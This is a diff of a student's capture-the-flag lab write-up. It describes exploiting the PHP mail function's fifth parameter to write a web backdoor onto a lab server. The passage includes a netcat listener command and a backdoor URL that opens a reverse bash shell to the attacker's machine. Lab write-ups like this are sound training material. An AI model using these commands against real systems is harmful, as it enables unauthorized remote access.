lithrion/lithrion.github.io/_class-projects/Final-Project.md

 This revealed the directory `192.168.1.115/vendor/PATH` which contained Flag1.

 #### Mail PHP Remote Code Execution
-For the next step, we were actually provided with a script for the exploit, but I did a little bit of research on it to see how it works.
+For the next step a script for the exploit, but I did a little bit of research on the script to see how it works.

 In the PHP mailer being used, there are five paramaters used by the mail function.
 The `to`, `subject`, and `message` paramaters are required paramaters, and `additional headers` and `additional_parameters` are two optional paramaters.
-It's the 5th paramater, the option `additional_parameters` that's interesting for exploitation purposes.
+It's the optional 5th paramater `additional_parameters` that's susceptible to exploitation.

-By creating a mail message with a carefully crafted 5th parameter an aritrary file could be written onto the server.
+By creating a mail message with a carefully crafted 5th parameter, an arbitrary file can be written onto the server.
 In this case it was used to write a file that enabled a php command injection attack.

-First, netcat was used to start a listener. `nc -lnvp 4444` and then the php command injection was used to open a back door.
+First, netcat was used to start a listener `nc -lnvp 4444` and then the php command injection was used to open a back door.
 `192.198.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash`

 That connection immediately revealed Flag2